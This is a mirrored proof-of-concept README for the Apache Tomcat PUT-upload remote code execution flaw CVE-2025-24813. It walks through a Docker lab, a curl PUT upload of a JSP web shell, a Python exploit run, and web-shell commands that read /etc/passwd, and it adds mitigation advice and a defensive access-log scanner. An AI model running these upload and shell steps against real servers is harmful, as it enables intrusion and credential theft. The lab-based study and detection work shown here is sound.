PoC details: 5e83d9f1ccac090ae41f615e43dd29ccedf89e96

Source
Related vulnerability
Title: Apache Tomcat environment issue vulnerability (CVE-2025-24813)
Description: Apache Tomcat is a lightweight web application server from the Apache Software Foundation (USA), used to provide Servlet and JavaServer Pages (JSP) support. Apache Tomcat versions 11.0.0-M1 through 11.0.2, 10.1.0-M1 through 10.1.34, and 9.0.0.M1 through 9.0.98 contain an environment issue vulnerability. An attacker who exploits it can execute code remotely or disclose sensitive information.
Description
Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC
Introduction
# 🚨 CVE-2025-24813 – Apache Tomcat PUT JSP RCE Exploit

![CVE](https://img.shields.io/badge/CVE-2025--24813-red)
![Exploit-Status](https://img.shields.io/badge/status-exploitable-critical)
![Platform](https://img.shields.io/badge/platform-Apache%20Tomcat-blue)
![Language](https://img.shields.io/badge/language-Python%203-yellow)
![Dockerized](https://img.shields.io/badge/env-Docker-green)
![License](https://img.shields.io/github/license/Shivshantp/cve-2025-24813)

This repository contains a complete proof-of-concept (PoC) for **CVE-2025-24813**, a Remote Code Execution (RCE) vulnerability in Apache Tomcat using the HTTP PUT method to deploy a malicious JSP web shell.

> 🔥 This exploit demonstrates how an attacker can achieve **RCE** via file upload and payload execution in improperly secured Tomcat instances.

---

## 📁 Project Structure

```
CVE-2025-24813/
├── docker/
│   ├── Dockerfile
│   └── web.xml
├── exploit/
│   ├── 1_exploit_cve_2025_24813.py
│   └── shell.jsp
├── screenshots/
│   ├── 1_tomcat_running.png
│   ├── 2_docker_started.png
│   ├── 3_upload_shell_jsp.png
│   ├── 4_run_python_exploit.png
│   ├── 5_access_shell_whoami.png
│   ├── 6_view_etc_passwd.png
│   ├── 7_run_uname_a.png
│   ├── 8_run_id.png
│   └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md
```

---

## 🚀 Exploitation Steps

### 1️⃣ Setup Docker Environment

```bash
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat
```

📸 ![Tomcat Running](./screenshots/1_tomcat_running.png)  
📸 ![Docker Started](./screenshots/2_docker_started.png)

---

### 2️⃣ Upload Malicious JSP Shell

```bash
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp
```

📸 ![Upload JSP](./screenshots/3_upload_shell_jsp.png)

---

### 3️⃣ Execute Python Exploit

```bash
python3 exploit/1_exploit_cve_2025_24813.py
```

📸 ![Run Exploit](./screenshots/4_run_python_exploit.png)

---

### 4️⃣ Interact with the Web Shell

```bash
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd
```

📸 ![whoami](./screenshots/5_access_shell_whoami.png)  
📸 ![passwd](./screenshots/6_view_etc_passwd.png)  
📸 ![uname](./screenshots/7_run_uname_a.png)  
📸 ![id](./screenshots/8_run_id.png)  
📸 ![pwd](./screenshots/9_run_pwd.png)

---

## 🧩 Features

- 🔧 Docker-based setup of vulnerable Apache Tomcat server
- 📥 PUT method abuse to upload and trigger JSP web shells
- 🐍 Python-based PoC script
- 📸 Full screenshot-based walkthrough
- 📚 Ideal for red team simulation & education

---

## 🛠️ How to Patch (Mitigation)

- 🚫 Disable PUT/DELETE methods in `web.xml` or server config
- ⛓️ Use security manager or stricter servlet container controls
- 🔐 Apply file-level upload filters and validation
- 🧱 Set up WAF to block unauthorized PUT requests
- ✅ Upgrade to a **secure and patched version** of Apache Tomcat
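As an added example (not code from the original repository), the following Python script scans Tomcat access-log lines written in the default `common` pattern (`%h %l %u %t "%r" %s %b`) and flags the write methods the list above recommends disabling, as well as the `shell.jsp?cmd=` request shape shown in step 4. The log lines are constructed samples, not real traffic.

```python
import re
from typing import Dict, List, Tuple

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

WRITE_METHODS = {"PUT", "DELETE"}          # methods the mitigation list says to disable
EXEC_EXTENSIONS = (".jsp", ".jspx")        # server-side executable pages

def parse_line(line: str) -> Dict[str, str]:
    """Split one access-log line into its fields; raise on an unknown layout."""
    m = LOG_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised access-log line: {line!r}")
    return m.groupdict()

def classify(entry: Dict[str, str]) -> str:
    """Return a severity label for one parsed request."""
    method, status = entry["method"], entry["status"]
    raw_path = entry["path"].lower()
    path = raw_path.split("?", 1)[0]
    if method in WRITE_METHODS:
        if status.startswith("2"):
            # An accepted PUT of a JSP means executable content reached the webroot.
            return "critical" if path.endswith(EXEC_EXTENSIONS) else "high"
        return "attempt"       # rejected (403/404/405): still worth counting per source host
    if method == "GET" and path.endswith(EXEC_EXTENSIONS) and "cmd=" in raw_path:
        return "critical"      # web-shell style command parameter on a JSP
    return "normal"

def scan(lines) -> List[Tuple[str, str, str, str, str]]:
    """Return (severity, host, method, path, status) for every non-normal line."""
    findings = []
    for line in lines:
        e = parse_line(line)
        level = classify(e)
        if level != "normal":
            findings.append((level, e["host"], e["method"], e["path"], e["status"]))
    return findings

# Constructed sample log (not captured from a real server).
SAMPLE_LOG = """\
127.0.0.1 - - [10/Mar/2025:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234
10.0.0.5 - - [10/Mar/2025:12:00:02 +0000] "PUT /shell.jsp HTTP/1.1" 201 -
10.0.0.5 - - [10/Mar/2025:12:00:03 +0000] "GET /shell.jsp?cmd=id HTTP/1.1" 200 48
10.0.0.7 - - [10/Mar/2025:12:00:04 +0000] "PUT /notes.txt HTTP/1.1" 403 -
10.0.0.8 - - [10/Mar/2025:12:00:05 +0000] "DELETE /old.html HTTP/1.1" 204 -
"""

def scan_sample():
    return scan(SAMPLE_LOG.strip().splitlines())
```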

---

## ⚠️ Disclaimer

> This project is for **educational and research purposes only**. Unauthorized testing, exploitation, or use on systems you do not own or have permission to test is illegal and unethical.

---

## 👨‍💻 Author

**Shivshant Patil**  
Certified Ethical Hacker (CEH v13)  
B.Tech Computer Engineering Graduate  
🔗 [LinkedIn](https://www.linkedin.com/in/shivshant-patil-b58aaa281)  
🔗 [GitHub](https://github.com/Shivshantp)

---
File snapshot

```
[4.0K] /data/pocs/5e83d9f1ccac090ae41f615e43dd29ccedf89e96
├── [4.0K] docker
│   ├── [ 486] Dockerfile
│   └── [169K] web.xml
├── [4.0K] exploit
│   ├── [1.1K] 1. exploit_cve_2025_24813.py
│   └── [ 469] 2. shell.jsp
├── [1.0K] LICENSE
├── [3.6K] README.md
└── [4.0K] screenshots
    ├── [ 53K] 1_tomcat_running.png
    ├── [316K] 2_docker_started.png
    ├── [ 57K] 3_upload_shell_jsp.png
    ├── [124K] 4_run_python_exploit.png
    ├── [ 30K] 5_access_shell_whoami.png
    ├── [ 84K] 6_view_etc_passwd.png
    ├── [ 37K] 7_run_uname_a.png
    ├── [ 23K] 8_run_id.png
    └── [ 22K] 9_run_pwd.png

3 directories, 15 files
```
Cached for you by the Shenlong bot.
Notes
    1. Accessing the PoC through the original source is recommended.
    2. If the source is unavailable or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.